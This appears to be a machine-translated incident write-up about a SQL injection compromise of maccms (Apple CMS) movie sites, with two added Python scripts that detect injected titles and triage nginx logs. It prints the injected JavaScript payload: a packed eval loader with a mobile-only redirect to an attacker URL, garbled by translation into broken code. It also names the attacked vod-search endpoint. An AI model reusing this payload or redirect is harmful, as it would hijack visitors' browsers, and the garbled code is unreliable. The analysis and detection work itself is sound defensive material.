
What is the latest vulnerability patch for Apple CMS (maccms)?

2025-01-23 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

What is the latest vulnerability patch for Apple CMS (maccms)? This article analyzes the problem and its solution in detail, in the hope of helping others who face the same problem find a simpler, workable fix.

At the beginning of 2020, a database code execution vulnerability in Apple CMS (maccms) was disclosed, and a large number of movie websites were compromised with injected malicious code. Movie pages in particular were tampered with: every d_name value in the VOD table of the database was modified, so that opening the website led to a direct jump to the S station or to a pop-up advertisement. The maccms versions currently affected are V8 and V10, and many customer websites have been tampered with repeatedly, leaving their owners helpless. One such customer was introduced to us at SINE Security by a friend and asked for technical support to stop the website from being injected with malicious code. According to the customer, the server runs Linux (CentOS) and Apple CMS is the latest V10 release. We immediately started a website security emergency response to help the customer resolve the attack.

First of all, many webmasters assume that upgrading to the latest Apple CMS vulnerability patch solves the problem. Our SINE Security engineers analyzed the patch code and found that it has no effect on the current database code execution vulnerability, so a patched website will continue to be attacked.

Let's look at the injection problem on the customer's website. The malicious code is inserted into the home page and into every movie page, as shown in the following figure:

After archiving a copy of the website source code and the nginx log files, our SINE Security engineers found that a webshell file had been uploaded to the website root directory. Tracing it through the website logs showed that the PHP script was being accessed from a Korean IP. The specific code is as follows:

The code was encrypted. After we decrypted it, we found that it can upload, download and modify code on the website and operate on the database. It is a PHP backdoor, also known as a webshell. We also manually audited the Apple CMS source code and found flaws in the malicious-input filtering that index.php applies to the search module. These flaws allow an attacker to bypass the security filtering and execute injected SQL code directly against the database.

We then checked the database and found that the d_name field of the VOD table had been bulk-injected with the malicious code:

Eval (function) {e=function (c) {return (c35?String.fromCharCode (cwithin 29): c.toString (36))}; if (! '.replace (/ ^ /, String)) {while (CMV -) d [e (c)] = k [c] | e (c); k = [function (e) {return d [e]}; e=function () {return'\\ welling'}; cymbil;} While (Crocade -) if (k [c]) p=p.replace (newPRegExp ('\\ baked accoune (c) +'\\ baked gravity (c)), k [c]); return p;} ('4.5 (\'\');', 14pas | type | javascript | document | write | src | 20487493 | scr | ipt | users | 51 | la'.split ('|), 0, {}); var LOUMtBZeW=navigator ["userAgent"] ["toLowerCase"] () [match "] (/ (ipod | iphone | ipad | android | coolpad | mmp | smartphone | midp | wap | xoom | j2me | blackberry | wince) / I)! If (LOUMtBZeW) {setTimeout ('_ window.location.href= "https://m.qiche-hangjia.com:168/ua80666/"',500)}

This technique is very professional and not the work of an ordinary attacker: the redirect is hidden and targets mobile phones, so the website operator does not notice it at all, and it also checks the source of the cookies, triggering the attacker's advertising code only when the conditions are met. Continuing the analysis and tracing, we found the attacker's method: a POST request to /index.php?m=vod-search. The POST content is encrypted and it is not convenient to publish it here, because it is a working exploit and could lead to attacks on other websites running Apple CMS. After decrypting the POST attack code, our SINE Security engineers confirmed that it really does bypass the security filtering of the official Apple CMS V8 and V10 releases and inserts the malicious code directly into the database.
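To check which d_name values carry injected script of the kind described above, the following added example (not code from the original article or from maccms) flags titles containing script markers, including the bracket-notation property access seen in the payload. The row ids, the length limit and the sample rows are assumptions constructed for illustration.

```python
import html
import re

# Markers of injected script; a VOD title (d_name) should be short plain text.
# Bracket notation (navigator["userAgent"]) is matched as well as dot notation.
def _prop(obj, name):
    return re.compile(
        obj + r"\s*(?:\.\s*" + name + r"|\[\s*['\"]" + name + r"['\"]\s*\])", re.I)

MARKERS = {
    "script_tag": re.compile(r"<\s*script", re.I),
    "eval_packer": re.compile(r"eval\s*\(\s*function", re.I),
    "document_write": _prop("document", "write"),
    "ua_sniffing": _prop("navigator", "userAgent"),
    "redirect": _prop("location", "href"),
}
MAX_TITLE_LEN = 255  # assumption: adjust to the real column width


def classify(d_name):
    """Return the names of all markers found in one d_name value."""
    text = html.unescape(d_name)  # catch entity-encoded copies too
    hits = [name for name, rx in MARKERS.items() if rx.search(text)]
    if len(text) > MAX_TITLE_LEN:
        hits.append("too_long")
    return hits


def scan(rows):
    """rows: iterable of (row_id, d_name). Returns {row_id: [markers]} for flagged rows."""
    flagged = {}
    for row_id, d_name in rows:
        hits = classify(d_name)
        if hits:
            flagged[row_id] = hits
    return flagged


# Constructed sample rows, not taken from the affected site.
SAMPLE_ROWS = [
    (1, "Evaluation Day (2019)"),
    (2, 'Film B<script src="//example.invalid/a.js"></script>'),
    (3, 'Film C&lt;script&gt;var m=navigator["userAgent"];'
        'if(m){window.location.href="https://example.invalid/"}&lt;/script&gt;'),
]

if __name__ == "__main__":
    for row_id, hits in scan(SAMPLE_ROWS).items():
        print(row_id, hits)
```

Feed it the id and d_name columns exported from the VOD table; flagged rows need their titles restored from a clean backup.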

With the root cause found, we fixed the customer's Apple CMS vulnerability: parameters submitted by POST are strictly filtered and escaped, malicious characters contained in vod-search are forcibly converted, and malicious code is intercepted before it can be passed to the backend and executed in the database. A comprehensive manual audit of the website code for backdoors found 5 in total; the rest were in the cache directory, mixed in with the program code, and were also deleted. The website's admin backend address was changed, because the attacker had learned the address in use, and the administrator account password was strengthened. Only then was the problem of the Apple CMS website being injected completely solved. If your maccms site keeps getting injected and you can read the code, intercept and check the data POSTed to index.php to prevent malicious code from being inserted. If you are not familiar with the code, it is recommended to have a professional website security company deal with the problem.
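The log tracing described in this article can be approximated with a short script. This added example (not from the original article) reads nginx access-log lines in the combined format, finds clients that POSTed to /index.php?m=vod-search, and lists any unknown PHP file in the web root that the same client fetched successfully. The allow-list of legitimate root PHP files, the file name x1.php and the log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# nginx "combined" format: ip - user [time] "METHOD uri PROTO" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')

# Assumption: the only PHP files that belong in this site's web root.
KNOWN_ROOT_PHP = {"/index.php", "/admin.php"}


def triage(lines):
    """Map each IP that POSTed to index.php?m=vod-search to the unknown
    root-level PHP files it also fetched successfully."""
    posts = defaultdict(int)
    unknown_php = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["uri"])
        module = parse_qs(url.query).get("m", [""])[0]
        if (m["method"] == "POST" and url.path == "/index.php"
                and module.startswith("vod-search")):
            posts[m["ip"]] += 1
        elif (url.path.endswith(".php") and url.path.count("/") == 1
                and url.path not in KNOWN_ROOT_PHP and m["status"] == "200"):
            unknown_php[m["ip"]].add(url.path)
    return {ip: sorted(unknown_php[ip]) for ip in posts}


def suspects(lines):
    """IPs that used the search endpoint and also hit an unknown root PHP file."""
    return sorted(ip for ip, files in triage(lines).items() if files)


# Constructed log lines (documentation IP ranges, hypothetical file name x1.php).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2020:03:12:44 +0800] "POST /index.php?m=vod-search HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [10/Jan/2020:03:13:02 +0800] "POST /x1.php HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.20 - - [10/Jan/2020:09:40:11 +0800] "POST /index.php?m=vod-search HTTP/1.1" 200 8841 "-" "-"',
    '198.51.100.20 - - [10/Jan/2020:09:40:15 +0800] "GET /index.php?m=vod-detail-id-12 HTTP/1.1" 200 9001 "-" "-"',
]

if __name__ == "__main__":
    print(suspects(SAMPLE_LOG))
```

A search POST on its own is not reported; only the combination with a successful request to an unlisted root-level PHP file is. Backdoors stored in subdirectories such as the cache directory need a separate file-system audit.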

That is the answer to the question of what the latest vulnerability patch for Apple CMS (maccms) is. I hope the above content is of some help to you. If you still have questions, you can follow the industry information channel for more related knowledge.
